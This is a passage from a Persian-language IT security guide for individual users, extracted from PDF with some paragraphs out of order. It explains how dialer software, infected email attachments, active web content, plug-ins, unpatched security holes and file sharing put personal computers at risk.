ﻣﻌﺎﻣﻼﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ،ﺍﻣﺎ ﺑﻴﺸﺘﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ
ﺷﺮﻛﺘﻬﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺧﻮﺍﻫﺎﻥ ﺭﺍﻩ ﺳﺎﺩﻩﺍﻱ ﻫﺴﺘﻨﺪ ﺗـﺎ
ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﺪﻭﻥ ﺿﻤﺎﻧﺖ ﻫﺰﻳﻨﻪﺍﻱ ﺭﺍ ﺍﺯ ﺣﺴﺎﺏ ﺷﻤﺎ ﻛـﺴﺮ
ﻧﻤﺎﻳﻨــﺪ .ﺩﺭ ﭼﻨــﻴﻦ ﻭﺿــﻌﻴﺘﻲ ﺷــﺮﻛﺖ ﻣﺨــﺎﺑﺮﺍﺕ ﻫﺰﻳﻨــﻪﻫــﺎﻱ
ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﻫﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻗﺴﻤﺘﻲ
ﺍﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ ﺑـﺎ ﺁﻥ
ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷـﺪﻩ ﺍﺳـﺖ ﺍﺭﺳـﺎﻝ ﻛﻨـﺪ .ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮ ﭼﻨـﻴﻦ
ﺷﻤﺎﺭﻩﺍﻱ ﺩﺍﺷﺘﻪﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ
ﻛﻨﺪ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﺷﻤﺎﺭﻩ ﺗﻤﺎﺱ ﺑﮕﻴـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﺗﻤـﺎﺱ ﺭﺍ
ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﺩ .ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺩﺭ ﺻﻮﺭﺗﺤﺴﺎﺏ ﭘﺎﻳـﺎﻥ
ﻣﺎﻩ ﺗﻠﻔﻦ ﺷﻤﺎ ﺩﺭﺝ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﭼﮕﻮﻧﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻧﺪ؟
ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺗﻨﻬﺎ ﺭﺍﻩ ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻮﺳـﻴﻠﺔ
ﻭﻳﺮﻭﺱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ،ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳـﺴﻜﻬﺎﻱ ﺁﻟـﻮﺩﻩ
٧٥
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﭼﻨﺪ ﺳﺎﻝ ﻗﺒـﻞ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﺎﻳﻌﺎﺗﻲ
ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜـﻪ ﺑـﺎ ﺩﺭﻳﺎﻓـﺖ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺁﻟـﻮﺩﻩ ﺷـﻮﻳﺪ .ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ
ﺳﻴﺴﺘﻢ ﻣﺠﺒﻮﺭ ﺑﻮﺩﻧﺪ ﻣﺪﺍﻭﻣﹰﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻨﺪ ﻛﻪ ﺍﻳﻦ
ﺍﻣﺮ "ﻏﻴﺮ ﻣﻤﻜﻦ" ﺍﺳﺖ ،ﻭ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ
ﻧﻴﺎﻳﺪ ،ﻣﺎﺷﻴﻦ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺩﺭ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﻫﺴﺘﻨﺪ.
ﺁﻟﻮﺩﻩ ﺷﺪﻥ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﺮﻭﺯ ﺩﻳﮕﺮ ﺍﻣـﺮ ﻣﺤـﺎﻟﻲ
ﻧﻴﺴﺖ ﻭ ﺩﺭﻭﺍﻗﻊ ﺑﺴﻴﺎﺭ ﻫﻢ ﻣﺤﺘﻤﻞ ﺍﺳﺖ .ﺩﻭ ﻗﺎﺑﻠﻴﺖ ﺍﺿﺎﻓﻪﺷﺪﻩ
ﺑﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻋﺚ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺪﻩﺍﻧﺪ.
ﺍﻭﻟﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺿـﻤﺎﻳﻢ ﺭﺍ ﺑـﺼﻮﺭﺕ
ﺧﻮﺩﻛﺎﺭ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ .ﺩﺭ ﮔﺬﺷﺘﻪ ﻛﺎﺭﺑﺮ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺫﺧﻴـﺮﻩ ﻭ
ﺳﭙﺲ ﺁﻧﺮﺍ ﺍﺟﺮﺍ ﻣﻲﻛـﺮﺩ ،ﺍﻣـﺎ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺟـﺮﺍﻱ ﺧﻮﺩﻛـﺎﺭ
ﺿــﻤﺎﺋﻢ ﻛﺎﺭﻫــﺎ ﺭﺍ -ﻣﺨــﺼﻮﺻﹰﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻣﺒﺘــﺪﻱ ﻛــﻪ
ﻣﻲﺧﻮﺍﻫﻨﺪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺍﺿﺎﻓﻪ ﺁﻧﭽﻪ ﻛﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ
ﺍﺳﺖ ﺭﺍ ﺑﺒﻴﻨﻨﺪ -ﺳﺎﺩﻩﺗﺮ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ
ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺧـﻼﻕ ﺑﺎﺷـﻨﺪ .ﺍﺧﻴـﺮﹰﺍ ﺗﻌـﺪﺍﺩﻱ
ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻣﻨﺘﺸﺮ ﺷﺪ ﻛﻪ ﺍﺩﻋﺎ ﻣﻲﻛـﺮﺩ
ﺍﺯ ﻃﺮﻑ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺍﺳﺖ ﻭ ﺣﺎﻭﻱ ﺁﺧﺮﻳﻦ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﻣﻲﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﻛﺮﻣﻬـﺎ ﺍﺯ ﺷـﻤﺎ ﻣﺤﺎﻓﻈـﺖ
ﻣﻲﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﻧﺎﻣﻪﻫﺎ ﺷﺎﻣﻞ ﺗـﺼﺎﻭﻳﺮ ﻭ ﻧﻤﺎﺩﻫـﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ
ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﻣﻌﺘﺒﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳـﻨﺪ ﻭ ﻟـﺬﺍ ﻛـﺎﺭﺑﺮ ﺭﺍ ﻣﺘﻘﺎﻋـﺪ
ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺿﻤﺎﻳﻢ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻋﺖ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺑﻴﺎﻳﻨـﺪ .ﻭﺍﺿـﺢ
ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ ﻛﺴﻲ ﺿﻤﻴﻤﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨـﺪ ﺩﭼـﺎﺭ ﺩﺭﺩﺳـﺮﻫﺎﻱ
ﺍﺳﺎﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﭘﺎﻳﮕﺎﻩ ﻭﺏ
ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﺒﻜﺔ ﮔﺴﺘﺮﺩﺓ ﺟﻬـﺎﻧﻲ ٥٦ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺪ ﺻـﻔﺤﺎﺕ
ﻭﺑﻲ ﺍﻳﺠﺎﺩ ﺷﺪﻧﺪ ﻛﻪ ﺷﺎﻣﻞ ﻣﺘﻨﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ ﺑﻮﺩﻧﺪ .ﺍﻛﻨـﻮﻥ ﺍﻳـﻦ
ﺻﻔﺤﺎﺕ ﺷﺎﻣﻞ ﻣﺤﺘﻮﻳﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻫﺴﺘﻨﺪ ،ﻣﺜـﻞ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﭘﻮﻳــﺎﻳﻲ ﻛــﻪ ﺭﻭﻱ ﻣﺎﺷــﻴﻦ ﺷــﻤﺎ downloadﺷــﺪﻩ ﻭ ﺍﺟــﺮﺍ
ﻣﻲ ﮔﺮﺩﻧﺪ ) ،Java ،Javascriptﻭ .(ActiveXﺍﮔﺮ ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺧﻮﺩ
ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺭﺍ ﺑـﺪﻭﻥ ﺑﺮﺭﺳـﻲ ﻗﺎﺑﻠﻴـﺖ ﺍﻃﻤﻴﻨـﺎﻥ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺟﺮﺍ ﻛﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺭﺍ
ﺑﺮﺧﻼﻑ ﺁﻧﭽﻪ ﻛﻪ ﺑﺎﻳﺪ ،ﺍﺟﺮﺍ ﻧﻤﺎﻳﺪ .ﺑﺮﻧﺎﻣﺔ Javascriptﺑﻄـﻮﺭ
ﻛﻠﻲ ﺍﻳﻤﻦ ﺍﺳـﺖ ،ﺍﻣـﺎ Javaﻭ ActiveXﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ
ﻻ ﻣﻲﺗﻮﺍﻥ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ ﻃـﻮﺭﻱ ﺗﻨﻈـﻴﻢ
ﺧﻄﺮﻧﺎﻙ ﺑﺎﺷﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﻛﺮﺩ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﻩ ﺍﺟﺮﺍ ﻧﺪﻫﻨﺪ ﻭ ﻳﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺟـﺮﺍﻱ
ﺁﻧﻬﺎ ﺍﺯ ﻛﺎﺭﺑﺮ ﺍﺟﺎﺯﻩ ﺑﮕﻴﺮﻧﺪ.
Plug-inﻫﺎ ﻭ Add-onﻫﺎ
ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻭ ﺑﺴﻴﺎﺭﻱ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺩﻳﮕﺮ )ﻣﺜﻞ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ
ﻛﻠﻤﻪ ٥٧ﻭ ﺻﻔﺤﺎﺕ ﮔﺴﺘﺮﺩﻩ (٥٨ﺑﻪ ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍ ﺷﺪﻥ
World-Wide Web
Word Processors
Spreadsheets
56
57
58
ﺑﺨﺶ ﺩﻭﻡ
ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﻮﺩﻧـﺪ ﺗﺒـﺎﺩﻝ ﻓﺎﻳـﻞ ﺍﻧﺠـﺎﻡ
ﻧﻤﻲﺩﺍﺩﻳﺪ ﺩﺭ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺳـﺮ ﻣـﻲﺑﺮﺩﻳـﺪ .ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIX
ﭼﻨﺪﺍﻥ ﻣﺴﺘﻌﺪ ﺩﺭﻳﺎﻓﺖ ﻭﻳﺮﻭﺱ ﻧﺒﻮﺩﻧﺪ ﺍﻣﺎ ﺑﻪ ﺩﻟﻴـﻞ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ
ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺷـﻜﺎﻻﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺞ ،ﺣﺘﻲ ﺩﺭ
ﺁﻥ ﺭﻭﺯﻫﺎ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ
ﺩﺳﺘﻴﺎﺑﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﻭ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺩﺭﺏ ﻣﺨﻔﻲ ﻧﺼﺐ
ﻧﻤﺎﻳﻨﺪ .ﺍﻭﻟﻴﻦ ﺣﺎﺩﺛﺔ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻛﺮﻣـﻲ ﺑـﻮﺩ ﻛـﻪ ﺩﺭ
ﺳﺎﻝ ۱۹۸۸ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ UNIXﺣﻤﻠﻪ ﻛﺮﺩ .ﺍﻣـﺮﻭﺯ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺷﻤﺎ ﺑﻪ ﺭﻭﺷـﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻳـﺪ.
ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺫﻛﺮ ﺷـﺪﻩﺍﻧـﺪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻣﺒﺘﻨﻲ ﺑﺮ Windowsﻣﻲ ﺷﻮﻧﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ Macintoshﻭ
Unixﺑﻪ ﻧﻮﻋﻲ ﻧﺴﺒﺖ ﺑﻪ ﺍﻳﻦ ﺣﻤﻠﻪﻫﺎ ﻛﻤﺘـﺮ ﻣـﺴﺘﻌﺪ ﻫـﺴﺘﻨﺪ؛
ﺍﻟﺒﺘﻪ ﻧﻪ ﺍﻟﺰﺍﻣﹰﺎ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﺍﻳﻤﻦﺗﺮ ﻫـﺴﺘﻨﺪ ،ﺑﻠﻜـﻪ ﺑـﻪ ﺍﻳـﻦ
ﻻ ﺳﻴـﺴﺘﻤﻬﺎﻱ Windowsﺑـﺮﺍﻱ ﻣﻬـﺎﺟﻤﻴﻦ
ﺩﻟﻴﻞ ﻛﻪ ﻣﻌﻤـﻮ ﹰ
ﺍﻫﺪﺍﻑ ﺟﺬﺍﺏﺗﺮﻱ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ Unixﺩﺭ ﺭﺩﺓ
ﺑﻌﺪﻱ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ Macintoshﺗـﺎ ﺑـﻪ ﺍﻣـﺮﻭﺯ
ﻛﻤﺘﺮﻳﻦ ﺻﺪﻣﻪ ﺭﺍ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺧﻮﺩ ﺩﻳﺪﻩﺍﻧﺪ.
ﺩﻭﻣﻴﻦ ﺗﻐﻴﻴﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭼـﻮﻥ ﺗـﻼﺵ ﺑـﺮ ﺍﻳـﻦ ﺑـﻮﺩﻩ ﻛـﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﺎﺩﻩ ﻭ ﻗﻮﻱﺗﺮ ﮔﺮﺩﺩ ،ﺍﻣﺮﻭﺯ ﺍﻣﻜـﺎﻥ
ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ HTMLﺩﺭ ﺑﺪﻧﺔ ﺍﺻﻠﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ؛ ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ HTMLﻣﻲﺗﻮﺍﻧﺪ ﺣـﺎﻭﻱ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ
ﻣﺸﻜﻠﺴﺎﺯ ﺑﺎﺷﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ HTMLﻣﻲﺗﻮﺍﻧﺪ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺭﺍ
ﺏ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ
ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺳﻤﺖ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭ ﹺ
ﻫﺪﺍﻳﺖ ﻛﻨﺪ ﻛﻪ ﺷﺎﻳﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻳﺎ ﻓﺮﺯﻧﺪﺍﻧﺘﺎﻥ ﻣﻨﺎﺳﺐ ﻧﺒﺎﺷﺪ.
٧٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺯ ﺩﺍﺧﻞ ﺑﺮﻧﺎﻣﺔ ﺍﺻـﻠﻲ ﺭﺍ ﻣـﻲ ﺩﻫﻨـﺪ .ﻧﻤﻮﻧـﺔ ﺭﺍﻳـﺞ ﺁﻥ ﺑﺮﻧﺎﻣـﺔ
" "Adobe Acrobat Readerﺍﺳـﺖ ﻛـﻪ ﺑـﻪ ﺷـﻤﺎ ﺍﺟـﺎﺯﻩ
ﻣﻲﺩﻫﺪ ﻫﻨﮕﺎﻡ ﻣـﺮﻭﺭ ﻭﺏ ،ﻓﺎﻳﻠﻬـﺎﻱ PDFﺭﺍ ﻣـﺸﺎﻫﺪﻩ ﻛﻨﻴـﺪ.
ﻫﻨﮕﺎﻣﻴﻜــﻪ plug-inﻫــﺎ ﻳــﺎ add-onﻫــﺎ ﻧــﺼﺐ ﻣــﻲﺷــﻮﻧﺪ
ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻛﺎﺭﻱ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﺍﻧﺠﺎﻡ ﻣـﻲﺩﻫـﺪ -ﻣﺎﻧﻨـﺪ
ﺧﻮﺍﻧﺪﻥ ﺍﺯ ﺩﻳـﺴﻚ ﻭ ﻧﻮﺷـﺘﻦ ﺭﻭﻱ ﺁﻥ ﻳـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒـﺎﻁ
ﺷﺒﻜﻪ -ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ،ﻭ ﻟﺬﺍ ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺯﻣـﺎﻧﻲ ﻧـﺼﺐ ﺷـﻮﻧﺪ ﻭ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﻣﺒﺪﺃ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻣـﻮﺭﺩ ﺍﻃﻤﻴﻨـﺎﻥ
ﺑﺎﺷﺪ.
ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺷﻜﺎﻻﺗﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻋﺎﻣـﻞ ﻳـﺎ
ﺩﻳﮕﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﻣﻲﺩﻫﻨﺪ .ﺩﺭ ﺳﺎﻟﻬﺎﻱ
ﺍﺧﻴﺮ ﺍﻛﺜﺮ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺎ ﺳـﺮﻋﺖ ﻗﺎﺑـﻞ ﻗﺒـﻮﻟﻲ ﺑـﻪ
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻳﺸﺎﻥ ﻛﺸﻒ ﻣﻲﺷـﻮﺩ ﭘﺎﺳـﺦ
ﻣﻲﺩﻫﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﮔﺮ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺭﻭﻱ
ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻗﺒـﻞ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﮔـﺴﺘﺮﺩﺓ
ﺍﺷﻜﺎﻻﺕ ،ﺭﺍﻫﻬﺎﻱ ﻧﻔﻮﺫ ﺭﺍ ﺑﺮ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺒﻨﺪﻳﺪ.
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎ
٥٩
ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔــﺬﺍﺭﻱ ﻓﺎﻳــﻞ ﺩﺭ ﺍﺷــﻜﺎﻝ ﻣﺨﺘﻠــﻒ ﺩﺭ ﻫﻤــﺔ
ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺩﺭ ﻣﻴـﺎﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ
ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪﻱ ﺍﺳـﺖ .ﺍﮔـﺮ ﭼﻨـﺪﻳﻦ ﺩﺳـﺘﮕﺎﻩ
ﻣﺨﺘﻠﻒ ﺩﺍﺭﻳﺪ ،ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻳﻚ ﻗﺎﺑﻠﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻮﺭﺩ
ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺍﺯ ﺭﻭﺵ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺯ
ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ﻭ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ )ﻣﺜﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻨﺎﺳـﺐ ﻭ ﻣﺤـﺪﻭﺩ
ﺑﻮﺩﻥ ﺍﻣﺘﻴﺎﺯ ﻧﻮﺷﺘﻦ ﻭ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ( ﻧﺪﺍﺭﻳـﺪ ،ﺁﻧﮕـﺎﻩ ﻫـﺮ ﻣﻬـﺎﺟﻤﻲ ﺩﺭ
